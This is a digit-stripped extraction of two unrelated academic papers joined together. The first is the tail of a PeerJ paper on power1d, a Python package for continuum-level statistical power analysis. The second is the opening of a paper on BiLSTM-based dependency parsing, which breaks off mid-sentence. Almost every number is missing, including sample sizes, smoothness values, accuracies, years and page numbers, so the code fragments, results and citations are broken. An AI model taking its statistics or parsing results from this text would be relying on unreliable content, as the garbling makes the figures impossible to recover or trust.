. . . po w er (a) fwhm = j = j = j = . . . . . . . effect size ( ) . . . . . . . . (b) fwhm = . . . . . . . effect size ( ) . . . . . . . . (c) fwhm = figure validation results for the inflated variance approach to d power. solid lines depict theo- retical solutions from the noncentral random field theory and dots depict power d’s numerically simu- lated results ( , iterations each). j represents sample size and fwhm represents the smoothness of the background noise process. (a) fwhm= , (b) fwhm= , (c) fwhm= . j = q = w = . df = j - alpha = . effect = . delta = effect * j ** . where delta is the noncentrality parameter. next power can be be computed via noncentral rft (hayasaka et al., ; mumford & nichols, ; joyce & hayasaka, ) as follows: u = power d.prob.t_isf( alpha , df , q , w ) p = power d.prob.nct_sf( zstar , df , q , w , delta ) here u is the critical threshold and nct_sf is rft’s noncentral t survival function. the analytical power is p= . . next, similar to the d validation above, power d can be used to validate this analytical power by constructing signal and noise objects as indicated below. note that the signal is constant (fig. ), as assumed by the noncentral rft method. baseline = power d.geom.null( q ) signal = power d.geom.null( q ) signal = power d.geom.constant( q , amp=effect ) n = power d.noise.smoothgaussian( j , q , mu= , sigma= , fwhm=w ) model = power d.datasample( baseline , signal , n , j=j ) model = power d.datasample( baseline , signal , n , j=j ) last, simulate the modeled experiments and numerically estimate power: teststat = power d.stats.t_ sample emodel = power d.models.experiment( model , teststat ) emodel = power d.models.experiment( model , teststat ) sim = power d.experimentsimulator( emodel , emodel ) pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . . effect size . . . . . po w er (a) fwhm = j = j = j = . . . . . . . effect size . . . . . (b) fwhm = . . . . . . . effect size . . . . . (c) fwhm = figure validation results for the noncentral random field theory approach to d power. solid lines depict theoretical solutions from the noncentral random field theory and dots depict power d’s numeri- cally simulated results ( , iterations each). fwhm and j represent continuum smoothness and sam- ple size, respectively. (a) fwhm= , (b) fwhm= , (c) fwhm= . results = sim.simulate( ) p = results.p_reject here the numerically estimated power is p= . , which is again similar to the analytical probability of p= . after just , iterations. repeating for smoothness values of , and , sample sizes of , and and effect sizes ranging from . to . yields the results depicted in fig. . agreement between the theoretical and numerically simulated powers is reasonable except for large effect sizes and intermediate sample sizes (fig. c, j = ). since theoretical and simulated results appear to diverge predominantly for high powers these results suggest that the noncentral rft approach is valid in scenarios where powers of approximately . are sought for relatively small sample sizes. while the noncentral rft approach has addressed the low-power limitation of the inflated variance method (fig. ), its ‘signal’ is geometrically simple in the form of a mean shift. clearly other, more complex signal geometries may be desirable. for example, in the context of the canadian temperature data (fig. ) one may have a forward dynamic model which predicts regional temperatures through region-specific parameters such as land formations, foliage, wind patterns, proximity to large bodies of water and atmospheric carbon dioxide. forward models like those can be used to generate specific continuum predictions based on, for example, increases in atmospheric carbon dioxide. those continuum predictions are almost certainly not simple signals like the ones represented by the inflated variance and noncentral rft methods. therefore, when planning an experiment to test continuum-level predictions, and specifically when determining how many continuum measurements are needed to achieve a threshold power, the numerical simulation capabilities of power d may be valuable. comparison with other software packages power calculations for d (scalar) data are available in most commercial and open-source statistical software packages. many of those offer limited functionality in that most are limited to the noncentral t distribution, and many have vague user interfaces in terms of experimental design. some also offer an interface to noncentral f computations, but nearly all have limited capabilities in terms of design. pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the most comprehensive and user-friendly software package for computing power is g-power (faul et al., ). in addition to the standard offerings of noncentral t computations, g-power also offers noncentral distributions for f, χ and a variety of other test statistics. it has an intuitive graphical user interface that is dedicated to power-specific questions. however, in the context of this paper g-power is identical to common software packages in that its power calculations are limited to d (scalar) data. two software packages dedicated to continuum-level power assessments, and those most closely related to power d are: . powermap (joyce & hayasaka, ). . fmripower (mumford & nichols, ). both powermap and fmripower are designed specifically for continuum-level power analysis, and both extend the standard noncentral t and f distributions to the continuum domain via rft. they have been used widely in the field of neuroimaging for planning brain imaging experiments and they both offer graphical interfaces with a convenient means of incorporating piiot data into guided power analyses. however, both are limited in terms of the modeled signals they offer. rft’s noncentral t and f distributions model ‘signal’ as a whole-continuum mean displacement, which is geometrically simple relative to the types of geometries that are possible at the continuum level (see the ‘software implementation: geometry section above). powermap and fmripower somewhat overcome the signal simplicity problem through continuum region constraints, where signal is modeled in some regions and not in others in a binary sense. this approach is computationally efficient but is still geometrically relatively simple. a second limitation of both packages is that they do not support numerical simulation of random continua. this is understandable because it is computationally infeasible to routinely simulate millions or even thousands of the large-volume d and d random continua that are the target of those packages’ power assessments. consequently neither powermap nor fmripower supports arbitrary continuum signal modeling. as outlined in the examples above power d replicates the core functionality of powermap and fmripower for d continua. it also offers functionality that does not yet exist in any other package: arbitrary continuum-level signal and noise modeling and associated computational power analysis though numerical simulation of random continua. this functionality greatly increases the flexibility with which one can model one’s data, and allows investigators to think about the signal and noise in real-world units, without directly thinking about effect sizes and effect continua. summary this paper has described a python package called power d for estimating power in experiments involving d continuum data. its two main features include (a) analytical continuum-level power calculations based on random field theory (rft) and (b) computational power analysis via continuum-level signal and noise modeling. numerical simulation is useful for d power analysis because d continuum signals can adopt arbitrary and non-parameterizable geometries. this study’s cross-validation results show pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. that power d’s numerical estimates closely follow theoretical solutions, and also that its computational demands are not excessive, with even relatively complex model simulations completing in under s. since power d accommodates arbitrary signals, arbitrary noise models and arbitrarily complex experimental designs it may be a viable choice for routine yet flexible power assessments prior to d continuum experimentation. additional information and declarations funding this work was supported by wakate a grant h from the japan society for the promotion of science. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: japan society for the promotion of science: h . competing interests the author declares there are no competing interests. author contributions • todd c. pataky conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, wrote the software and its documentation. data availability the following information was supplied regarding data availability: all code, including scripts to replicate the paper’s results, are available at http: //www.spm d.org/power d. references adler r, hasofer a. . level crossings for random fields. the annals of probability ( ): – doi . /aop/ . continuum analytics. . anaconda: leading open data science platform powered by python. https://www.continuum.io/anaconda-overview. faul f, erdfelder e, lang a-g, buchner a. . g*power : a flexible statistical power analysis program for the social, behavioral, and biomedical sciences. behavior research methods ( ): – doi . /bf . friston k, worsley k, frackowiak r, mazziotta j, evans a. . assessing the significance of focal activations using their spatial extent. human brain mapping ( ): – doi . /hbm. . pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.spm d.org/power d http://www.spm d.org/power d http://dx.doi.org/ . /aop/ https://www.continuum.io/anaconda-overview http://dx.doi.org/ . /bf http://dx.doi.org/ . /hbm. http://dx.doi.org/ . /peerj-cs. friston kj, ashburner jt, kiebel sj, nichols te, penny wd. . statistical paramet- ric mapping: the analysis of functional brain images. london: elsevier. friston kj, holmes a, poline jb, price cj, frith cd. . detecting activations in pet and fmri: levels of inference and power. neuroimage ( ): – doi . /nimg. . . hasofer am. . upcrossings of random fields. advances in applied probability : – doi . /s . hayasaka s, peiffer am, hugenschmidt ce, laurienti pj. . power and sample size calculation for neuroimaging studies by non-central random field theory. neuroimage ( ): – doi . /j.neuroimage. . . . hunter jd. . matplotlib: a d graphics environment. computing in science and engineering ( ): – . jones e, oliphant t, peterson p. . scipy: open source scientific tools for python. available at http://www.scipy.org/ . joyce ke, hayasaka s. . development of powermap: a software package for statis- tical power calculation in neuroimaging studies. neuroinformatics ( ): – doi . /s - - - . kiebel s, poline j, friston k, holmes a, worsley k. . robust smoothness estima- tion in statistical parametric maps using standardized residuals from the general linear model. neuroimage ( ): – doi . /nimg. . . mumford j, nichols te. . power calculation for group fmri studies accounting for arbitrary design and temporal autocorrelation. neuroimage ( ): – doi . /j.neuroimage. . . . nichols t, holmes a. . nonparametric permutation tests for functional neuroimaging: a primer with examples. human brain mapping ( ): – doi . /hbm. . pataky tc. . rft d: smooth one-dimensional random field upcrossing probabilities in python. journal of statistical software ( ): – . ramsay jo, silverman bw. . functional data analysis. new york: springer-verlag. van der walt s, colbert sc, varoquaux g. . the numpy array: a structure for efficient numerical computation. computing in science and engineering : – . van rossum g. . the python library reference release . . . available at https: //docs.python.org/ /library/ . pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nimg. . http://dx.doi.org/ . /s http://dx.doi.org/ . /j.neuroimage. . . http://www.scipy.org/ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /nimg. . http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /hbm. https://docs.python.org/ /library/ https://docs.python.org/ /library/ http://dx.doi.org/ . /peerj-cs. simple and accurate dependency parsing using bidirectional lstm feature representations eliyahu kiperwasser computer science department bar-ilan university ramat-gan, israel elikip@gmail.com yoav goldberg computer science department bar-ilan university ramat-gan, israel yoav.goldberg@gmail.com abstract we present a simple and effective scheme for dependency parsing which is based on bidirectional-lstms (bilstms). each sen- tence token is associated with a bilstm vec- tor representing the token in its sentential con- text, and feature vectors are constructed by concatenating a few bilstm vectors. the bilstm is trained jointly with the parser ob- jective, resulting in very effective feature ex- tractors for parsing. we demonstrate the ef- fectiveness of the approach by applying it to a greedy transition-based parser as well as to a globally optimized graph-based parser. the resulting parsers have very simple architec- tures, and match or surpass the state-of-the-art accuracies on english and chinese. introduction the focus of this paper is on feature represen- tation for dependency parsing, using recent tech- niques from the neural-networks (“deep learning”) literature. modern approaches to dependency pars- ing can be broadly categorized into graph-based and transition-based parsers (kübler et al., ). graph-based parsers (mcdonald, ) treat pars- ing as a search-based structured prediction prob- lem in which the goal is learning a scoring func- tion over dependency trees such that the correct tree is scored above all other trees. transition-based parsers (nivre, ; nivre, ) treat parsing as a sequence of actions that produce a parse tree, and a classifier is trained to score the possible actions at each stage of the process and guide the parsing pro- cess. perhaps the simplest graph-based parsers are arc-factored (first order) models (mcdonald, ), in which the scoring function for a tree decomposes over the individual arcs of the tree. more elaborate models look at larger (overlapping) parts, requiring more sophisticated inference and training algorithms (martins et al., ; koo and collins, ). the basic transition-based parsers work in a greedy man- ner, performing a series of locally-optimal decisions, and boast very fast parsing speeds. more advanced transition-based parsers introduce some search into the process using a beam (zhang and clark, ) or dynamic programming (huang and sagae, ). regardless of the details of the parsing frame- work being used, a crucial step in parser design is choosing the right feature function for the underly- ing statistical model. recent work (see section . for an overview) attempt to alleviate parts of the fea- ture function design problem by moving from lin- ear to non-linear models, enabling the modeler to focus on a small set of “core” features and leav- ing it up to the machine-learning machinery to come up with good feature combinations (chen and man- ning, ; pei et al., ; lei et al., ; taub- tabib et al., ). however, the need to carefully define a set of core features remains. for exam- ple, the work of chen and manning ( ) uses different elements in its feature function, while the work of pei et al. ( ) uses different elements. other works, notably dyer et al. ( ) and le and zuidema ( ), propose more sophisticated feature representations, in which the feature engineering is replaced with architecture engineering. in this work, we suggest an approach which is much simpler in terms of both feature engineering transactions of the association for computational linguistics, vol. , pp. – , . action editor: marco kuhlmann. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. and architecture engineering. our proposal (section ) is centered around birnns (irsoy and cardie, ; schuster and paliwal, ), and more specif- ically bilstms (graves, ), which are strong and trainable sequence models (see section . ). the bilstm excels at representing elements in a sequence (i.e., words) together with their contexts, capturing the element and an “infinite” window around it. we represent each word by its bilstm encoding, and use a concatenation of a minimal set of such bilstm encodings as our feature function, which is then passed to a non-linear scoring function (multi-layer perceptron). crucially, the bilstm is trained with the rest of the parser in order to learn a good feature representation for the parsing prob- lem. if we set aside the inherent complexity of the bilstm itself and treat it as a black box, our pro- posal results in a pleasingly simple feature extractor. we demonstrate the effectiveness of the approach by using the bilstm feature extractor in two pars- ing architectures, transition-based (section ) as well as a graph-based (section ). in the graph- based parser, we jointly train a structured-prediction model on top of a bilstm, propagating errors from the structured objective all the way back to the bilstm feature-encoder. to the best of our knowl- edge, we are the first to perform such end-to-end training of a structured prediction model and a recur- rent feature extractor for non-sequential outputs. aside from the novelty of the bilstm feature extractor and the end-to-end structured training, we rely on existing models and techniques from the parsing and structured prediction literature. we stick to the simplest parsers in each category – greedy inference for the transition-based architec- ture, and a first-order, arc-factored model for the graph-based architecture. despite the simplicity of the parsing architectures and the feature func- tions, we achieve near state-of-the-art parsing ac- curacies in both english ( . uas) and chinese ( . uas), using a first-order parser with two fea- tures and while training solely on treebank data, without relying on semi-supervised signals such as pre-trained word embeddings (chen and manning, ), word-clusters (koo et al., ), or tech- structured training of sequence tagging models over rnn- based representations was explored by chiu and nichols ( ) and lample et al. ( ). niques such as tri-training (weiss et al., ). when also including pre-trained word embeddings, we obtain further improvements, with accuracies of . uas (english) and . uas (chinese) for a greedy transition-based parser with features, and . uas (en) / . (ch) for a greedy transition- based parser with features. background and notation notation we use x :n to denote a sequence of n vectors x , · · · ,xn. fθ(·) is a function parameter- ized with parameters θ. we write fl(·) as shorthand for fθl – an instantiation of f with a specific set of parameters θl. we use ◦ to denote a vector con- catenation operation, and v[i] to denote an indexing operation taking the ith element of a vector v. . feature functions in dependency parsing traditionally, state-of-the-art parsers rely on linear models over hand-crafted feature functions. the fea- ture functions look at core components (e.g. “word on top of stack”, “leftmost child of the second-to- top word on the stack”, “distance between the head and the modifier words”), and are comprised of sev- eral templates, where each template instantiates a bi- nary indicator function over a conjunction of core elements (resulting in features of the form “word on top of stack is x and leftmost child is y and . . . ”). the design of the feature function – which compo- nents to consider and which combinations of com- ponents to include – is a major challenge in parser design. once a good feature function is proposed in a paper it is usually adopted in later works, and sometimes tweaked to improve performance. ex- amples of good feature functions are the feature-set proposed by zhang and nivre ( ) for transition- based parsing (including roughly core compo- nents and feature templates), and the feature- set proposed by mcdonald et al. ( ) for graph- based parsing, with the paper listing templates for a first-order parser, while the first order feature- extractor in the actual implementation’s code (mst- parser ) includes roughly a hundred feature tem- plates. http://www.seas.upenn.edu/~strctlrn/ mstparser/mstparser.html http://www.seas.upenn.edu/~strctlrn/mstparser/mstparser.html http://www.seas.upenn.edu/~strctlrn/mstparser/mstparser.html the core features in a transition-based parser usu- ally look at information such as the word-identity and part-of-speech (pos) tags of a fixed number of words on top of the stack, a fixed number of words on the top of the buffer, the modifiers (usually left- most and right-most) of items on the stack and on the buffer, the number of modifiers of these elements, parents of words on the stack, and the length of the spans spanned by the words on the stack. the core features of a first-order graph-based parser usually take into account the word and pos of the head and modifier items, as well as pos-tags of the items around the head and modifier, pos tags of items be- tween the head and modifier, and the distance and direction between the head and modifier. . related research efforts coming up with a good feature-set for a parser is a hard and time consuming task, and many researchers attempt to reduce the required manual effort. the work of lei et al. ( ) suggests a low-rank ten- sor representation to automatically find good feature combinations. taub-tabib et al. ( ) suggest a kernel-based approach to implicitly consider all pos- sible feature combinations over sets of core-features. the recent popularity of neural networks prompted a move from templates of sparse, binary indicator features to dense core feature encodings fed into non-linear classifiers. chen and manning ( ) en- code each core feature of a greedy transition-based parser as a dense low-dimensional vector, and the vectors are then concatenated and fed into a non- linear classifier (multi-layer perceptron) which can potentially capture arbitrary feature combinations. weiss et al. ( ) showed further gains using the same approach coupled with a somewhat improved set of core features, a more involved network archi- tecture with skip-layers, beam search-decoding, and careful hyper-parameter tuning. pei et al. ( ) apply a similar methodology to graph-based pars- ing. while the move to neural-network classi- fiers alleviates the need for hand-crafting feature- combinations, the need to carefully define a set of core features remain. for example, the feature rep- resentation in chen and manning ( ) is a con- catenation of word vectors, pos vectors and dependency-label vectors. the above works tackle the effort in hand-crafting effective feature combinations. a different line of work attacks the feature-engineering problem by suggesting novel neural-network architectures for encoding the parser state, including intermediately- built subtrees, as vectors which are then fed to non- linear classifiers. titov and henderson encode the parser state using incremental sigmoid-belief net- works ( ). in the work of dyer et al. ( ), the entire stack and buffer of a transition-based parser are encoded as a stack-lstms, where each stack el- ement is itself based on a compositional represen- tation of parse trees. le and zuidema ( ) en- code each tree node as two compositional represen- tations capturing the inside and outside structures around the node, and feed the representations into a reranker. a similar reranking approach, this time based on convolutional neural networks, is taken by zhu et al. ( ). finally, in kiperwasser and gold- berg ( ) we present an easy-first parser based on a novel hierarchical-lstm tree encoding. in contrast to these, the approach we present in this work results in much simpler feature functions, without resorting to elaborate network architectures or compositional tree representations. work by vinyals et al. ( ) employs a sequence-to-sequence with attention architecture for constituency parsing. each token in the input sen- tence is encoded in a deep-bilstm representation, and then the tokens are fed as input to a deep- lstm that predicts a sequence of bracketing ac- tions based on the already predicted bracketing as well as the encoded bilstm vectors. a trainable attention mechanism is used to guide the parser to relevant bilstm vectors at each stage. this ar- chitecture shares with ours the use of bilstm en- coding and end-to-end training. the sequence of bracketing actions can be interpreted as a sequence of shift and reduce operations of a transition-based parser. however, while the parser of vinyals et al. in all of these neural-network based approaches, the vec- tor representations of words were initialized using pre-trained word-embeddings derived from a large corpus external to the training data. this puts the approaches in the semi-supervised category, making it hard to tease apart the contribution of the au- tomatic feature-combination component from that of the semi- supervised component. relies on a trainable attention mechanism for fo- cusing on specific bilstm vectors, parsers in the transition-based family we use in section use a hu- man designed stack and buffer mechanism to manu- ally direct the parser’s attention. while the effec- tiveness of the trainable attention approach is im- pressive, the stack-and-buffer guidance of transition- based parsers results in more robust learning. in- deed, work by cross and huang ( ), published while working on the camera-ready version of this paper, show that the same methodology as ours is highly effective also for greedy, transition-based constituency parsing, surpassing the beam-based ar- chitecture of vinyals et al. ( . f vs. . f points) when trained on the penn treebank dataset and with- out using orthogonal methods such as ensembling and up-training. . bidirectional recurrent neural networks recurrent neural networks (rnns) are statistical learners for modeling sequential data. an rnn al- lows one to model the ith element in the sequence based on the past – the elements x :i up to and in- cluding it. the rnn model provides a framework for conditioning on the entire history x :i without resorting to the markov assumption which is tradi- tionally used for modeling sequences. rnns were shown to be capable of learning to count, as well as to model line lengths and complex phenomena such as bracketing and code indentation (karpathy et al., ). our proposed feature extractors are based on a bidirectional recurrent neural network (birnn), an extension of rnns that take into account both the past x :i and the future xi:n. we use a specific flavor of rnn called a long short-term memory network (lstm). for brevity, we treat rnn as an abstrac- tion, without getting into the mathematical details of the implementation of the rnns and lstms. for further details on rnns and lstms, the reader is referred to goldberg ( ) and cho ( ). the recurrent neural network (rnn) abstraction is a parameterized function rnnθ(x :n) mapping a sequence of n input vectors x :n, xi ∈ rdin to a se- quence of n output vectors h :n,hi ∈ rdout . each output vector hi is conditioned on all the input vec- tors x :i, and can be thought of as a summary of the prefix x :i of x :n. in our notation, we ignore the intermediate vectors h :n− and take the output of rnnθ(x :n) to be the vector hn. a bidirectional rnn is composed of two rnns, rnnf and rnnr, one reading the sequence in its regular order, and the other reading it in reverse. concretely, given a sequence of vectors x :n and a desired index i, the function birnnθ(x :n, i) is de- fined as: birnnθ(x :n, i) = rnnf (x :i)◦ rnnr(xn:i) the vector vi = birnn(x :n, i) is then a represen- tation of the ith item in x :n, taking into account both the entire history x :i and the entire future xi:n by concatenating the matching rnns. we can view the birnn encoding of an item i as representing the item i together with a context of an infinite window around it. computational complexity computing the birnn vectors encoding of the ith element of a sequence x :n requires o(n) time for computing the two rnns and concatenating their outputs. a naive approach of computing the bidirectional representation of all n elements result in o(n ) computation. however, it is trivial to compute the birnn encoding of all sequence items in linear time by pre-computing rnnf (x :n) and rnnr(xn: ), keeping the intermediate representa- tions, and concatenating the required elements as needed. birnn training initially, the birnn encodings vi do not capture any particular information. during training, the encoded vectors vi are fed into further network layers, until at some point a prediction is made, and a loss is incurred. the back-propagation algorithm is used to compute the gradients of all the parameters in the network (including the birnn pa- rameters) with respect to the loss, and an optimizer is used to update the parameters according to the gradients. the training procedure causes the birnn function to extract from the input sequence x :n the relevant information for the task task at hand. going deeper we use a variant of deep bidirectional rnn (or k-layer birnn) which is composed of k birnn functions birnn , · · · , birnnk that feed into each other: the output birnn`(x :n, ), . . . , birnn`(x :n,n) of birnn` becomes the input of birnn`+ . stacking birnns in this way has been empirically shown to be effective (irsoy and cardie, ). in this work, we use birnns and deep-birnns interchangeably, specifying the number of layers when needed. historical notes rnns were introduced by el- man ( ), and extended to birnns by schus- ter and paliwal ( ). the lstm variant of rnns is due to hochreiter and schmidhuber ( ). bilstms were recently popularized by graves ( ), and deep birnns were introduced to nlp by irsoy and cardie ( ), who used them for se- quence tagging. in the context of parsing, lewis et al. ( ) and vaswani et al. ( ) use a bilstm sequence tagging model to assign a ccg supertag for each token in the sentence. lewis et al. ( ) feeds the resulting supertags sequence into an a* ccg parser. vaswani et al. ( ) adds an addi- tional layer of lstm which receives the bilstm representation together with the k-best supertags for each word and outputs the most likely supertag given previous tags, and then feeds the predicted su- pertags to a discriminitively trained parser. in both works, the bilstm is trained to produce accurate ccg supertags, and is not aware of the global pars- ing objective. our approach we propose to replace the hand-crafted feature func- tions in favor of minimally-defined feature functions which make use of automatically learned bidirec- tional lstm representations. given n-words input sentence s with words w , . . . ,wn together with the corresponding pos tags t , . . . , tn, we associate each word wi and pos ti with embedding vectors e(wi) and e(ti), and cre- ate a sequence of input vectors x :n in which each xi is a concatenation of the corresponding word and pos vectors: xi = e(wi)◦e(pi) the embeddings are trained together with the model. this encodes each word in isolation, disregarding its context. we introduce context by representing each in this work the tag sequence is assumed to be given, and in practice is predicted by an external model. future work will address relaxing this assumption. input element as its (deep) bilstm vector, vi: vi = bilstm(x :n, i) our feature function φ is then a concatenation of a small number of bilstm vectors. the exact fea- ture function is parser dependent and will be dis- cussed when discussing the corresponding parsers. the resulting feature vectors are then scored using a non-linear function, namely a multi-layer perceptron with one hidden layer (mlp): mlpθ(x) = w · tanh(w ·x + b ) + b where θ = {w ,w ,b ,b } are the model parame- ters. beside using the bilstm-based feature func- tions, we make use of standard parsing techniques. crucially, the bilstm is trained jointly with the rest of the parsing objective. this allows it to learn rep- resentations which are suitable for the parsing task. consider a concatenation of two bilstm vectors (vi ◦vj) scored using an mlp. the scoring function has access to the words and pos-tags of vi and vj, as well as the words and pos-tags of the words in an infinite window surrounding them. as lstms are known to capture length and sequence position in- formation, it is very plausible that the scoring func- tion can be sensitive also to the distance between i and j, their ordering, and the sequential material be- tween them. parsing-time complexity once the bilstm is trained, parsing is performed by first computing the bilstm encoding vi for each word in the sentence (a linear time operation). then, parsing proceeds as usual, where the feature extraction involves a con- catenation of a small number of the pre-computed vi vectors. transition-based parser we begin by integrating the feature extractor in a transition-based parser (nivre, ). we follow the notation in goldberg and nivre ( ). the while the bilstm computation is quite efficient as it is, as demonstrated by lewis et al. ( ), if using a gpu imple- mentation the bilstm encoding can be efficiently performed over many of sentences in parallel, making its computation cost almost negligible. the s jumped s over s the b lazy b dog b root b fox brown configuration: scoring: lstmf xthe concat lstmf xbrown concat lstmf xfox concat lstmf xjumped concat lstmf xover concat lstmf xthe concat lstmf xlazy concat lstmf xdog concat lstmf xroot concat lstmb s lstmb s lstmb s lstmb s lstmb s lstmb s lstmb s lstmb s lstmb s vthe vbrown vfox vjumped vover vthe vlazy vdog vroot mlp (scoreleftarc,scorerightarc,scoreshift) figure : illustration of the neural model scheme of the transition-based parser when calculating the scores of the possible transitions in a given configuration. the configuration (stack and buffer) is depicted on the top. each transition is scored using an mlp that is fed the bilstm encodings of the first word in the buffer and the three words at the top of the stack (the colors of the words correspond to colors of the mlp inputs above), and a transition is picked greedily. each xi is a concatenation of a word and a pos vector, and possibly an additional external embedding vector for the word. the figure depicts a single-layer bilstm, while in practice we use two layers. when parsing a sentence, we iteratively compute scores for all possible transitions and apply the best scoring action until the final configuration is reached. transition-based parsing framework assumes a tran- sition system, an abstract machine that processes sentences and produces parse trees. the transition system has a set of configurations and a set of tran- sitions which are applied to configurations. when parsing a sentence, the system is initialized to an ini- tial configuration based on the input sentence, and transitions are repeatedly applied to this configura- tion. after a finite number of transitions, the system arrives at a terminal configuration, and a parse tree is read off the terminal configuration. in a greedy parser, a classifier is used to choose the transition to take in each configuration, based on features ex- tracted from the configuration itself. the parsing al- gorithm is presented in algorithm below. given a sentence s, the parser is initialized with the configuration c (line ). then, a feature func- tion φ(c) represents the configuration c as a vector, which is fed to a scoring function score assign- ing scores to (configuration,transition) pairs. score algorithm greedy transition-based parsing : input: sentence s = w , . . . ,xw, t , . . . , tn, parameterized function scoreθ(·) with param- eters θ. : c ← initial(s) : while not terminal(c) do : t̂ ← arg maxt∈legal(c) scoreθ ( φ(c), t ) : c ← t̂(c) : return tree(c) scores the possible transitions t, and the highest scoring transition t̂ is chosen (line ). the transition t̂ is applied to the configuration, resulting in a new parser configuration. the process ends when reach- ing a final configuration, from which the resulting parse tree is read and returned (line ). transition systems differ by the way they define configurations, and by the particular set of transi- tions available to them. a parser is determined by the choice of a transition system, a feature function φ and a scoring function score. our choices are detailed below. the arc-hybrid system many transition systems exist in the literature. in this work, we use the arc- hybrid transition system (kuhlmann et al., ), which is similar to the more popular arc-standard system (nivre, ), but for which an efficient dy- namic oracle is available (goldberg and nivre, ; goldberg and nivre, ). in the arc-hybrid sys- tem, a configuration c = (σ,β,t) consists of a stack σ, a buffer β, and a set t of dependency arcs. both the stack and the buffer hold integer indices pointing to sentence elements. given a sentence s = w , . . . ,wn, t , . . . , tn, the system is initial- ized with an empty stack, an empty arc set, and β = , . . . ,n,root , where root is the special root index. any configuration c with an empty stack and a buffer containing only root is terminal, and the parse tree is given by the arc set tc of c. the arc- hybrid system allows possible transitions, shift, left` and right`, defined as: shift[(σ, b |β, t)] = (σ|b , β, t) left`[(σ|s |s , b |β, t)] = (σ|s , b |β, t ∪{(b ,s ,`)}) right`[(σ|s |s , β, t)] = (σ|s , β, t ∪{(s ,s ,`)}) the shift transition moves the first item of the buffer (b ) to the stack. the left` transition re- moves the first item on top of the stack (s ) and attaches it as a modifier to b with label `, adding the arc (b ,s ,`). the right` transition removes s from the stack and attaches it as a modifier to the next item on the stack (s ), adding the arc (s ,s ,`). scoring function traditionally, the scoring func- tion scoreθ(x,t) is a discriminative linear model of the form scorew (x,t) = (w · x)[t]. the lin- earity of score required the feature function φ(·) to encode non-linearities in the form of combination features. we follow chen and manning ( ) and replace the linear scoring model with an mlp. scoreθ(x,t) = mlpθ(x)[t] simple feature function the feature function φ(c) is typically complex (see section . ). our feature function is the concatenated bilstm vec- tors of the top items on the stack and the first item on the buffer. i.e., for a configuration c = (. . . |s |s |s , b | . . . , t) the feature extractor is defined as: φ(c) = vs ◦vs ◦vs ◦vb vi = bilstm(x :n, i) this feature function is rather minimal: it takes into account the bilstm representations of s ,s and b , which are the items affected by the possible transitions being scored, as well as one extra stack context s . figure depicts transition scoring with our architecture and this feature function. note that, unlike previous work, this feature function does not take into account t , the already built structure. the high parsing accuracies in the experimental sections suggest that the bilstm encoding is capable of es- timating a lot of the missing information based on the provided stack and buffer elements and the se- quential content between them. while not explored in this work, relying on only four word indices for scoring an action re- sults in very compact state signatures, making our proposed feature representation very appeal- ing for use in transition-based parsers that employ dynamic-programming search (huang and sagae, ; kuhlmann et al., ). extended feature function one of the benefits of the greedy transition-based parsing framework is precisely its ability to look at arbitrary features from the already built tree. if we allow somewhat less minimal feature function, we could add the bilstm vectors corresponding to the right-most and left- most modifiers of s , s and s , as well as the left- most modifier of b , reaching a total of bilstm vectors. we refer to this as the extended feature set. as we’ll see in section , using the extended set does indeed improve parsing accuracies when using pre-trained word embeddings, but has a minimal ef- fect in the fully-supervised case. an additional buffer context is not needed, as b is by def- inition adjacent to b , a fact that we expect the bilstm en- coding of b to capture. in contrast, b , s , s and s are not necessarily adjacent to each other in the original sentence. we did not experiment with other feature configurations. it is well possible that not all of the additional child encodings are needed for the observed accuracy gains, and that a smaller feature set will yield similar or even better improvements. . details of the training algorithm the training objective is to set the score of correct transitions above the scores of incorrect transitions. we use a margin-based objective, aiming to maxi- mize the margin between the highest scoring correct action and the highest scoring incorrect action. the hinge loss at each parsing configuration c is defined as: max ( , −max to∈g mlp ( φ(c) ) [to] + max tp∈a\g mlp ( φ(c) ) [tp] ) where a is the set of possible transitions and g is the set of correct (gold) transitions at the cur- rent stage. at each stage of the training process the parser scores the possible transitions a, incurs a loss, selects a transition to follow, and moves to the next configuration based on it. the local losses are summed throughout the parsing process of a sen- tence, and the parameters are updated with respect to the sum of the losses at sentence boundaries. the gradients of the entire network (including the mlp and the bilstm) with respect to the sum of the losses are calculated using the backpropagation algorithm. as usual, we perform several training it- erations over the training corpus, shuffling the order of sentences in each iteration. error-exploration and dynamic oracle training we follow goldberg and nivre ( );goldberg and nivre ( ) in using error exploration training with a dynamic-oracle, which we briefly describe below. at each stage in the training process, the parser assigns scores to all the possible transitions t ∈ a. it then selects a transition, applies it, and moves to the next step. which transition should be followed? a common approach follows the highest scoring tran- sition that can lead to the gold tree. however, when training in this way the parser sees only configura- tions that result from following correct actions, and as a result tends to suffer from error propagation at to increase gradient stability and training speed, we simu- late mini-batch updates by only updating the parameters when the sum of local losses contains at least non-zero elements. sums of fewer elements are carried across sentences. this as- sures us a sufficient number of gradient samples for every up- date thus minimizing the effect of gradient instability. test time. instead, in error-exploration training the parser follows the highest scoring action in a dur- ing training even if this action is incorrect, exposing it to configurations that result from erroneous deci- sions. this strategy requires defining the set g such that the correct actions to take are well-defined also for states that cannot lead to the gold tree. such a set g is called a dynamic oracle. we perform error-exploration training using the dynamic-oracle defined by goldberg and nivre ( ). aggressive exploration we found that even when using error-exploration, after one iteration the model remembers the training set quite well, and does not make enough errors to make error-exploration effec- tive. in order to expose the parser to more errors, we follow an aggressive-exploration scheme: we sometimes follow incorrect transitions also if they score below correct transitions. specifically, when the score of the correct transition is greater than that of the wrong transition but the difference is smaller than a margin constant, we chose to follow the incor- rect action with probability pagg (we use pagg = . in our experiments). summary the greedy transition-based parser follows standard techniques from the literature (margin-based objective, dynamic oracle training, error exploration, mlp-based non-linear scoring function). we depart from the literature by re- placing the hand-crafted feature function over care- fully selected components of the configuration with a concatenation of bilstm representations of a few prominent 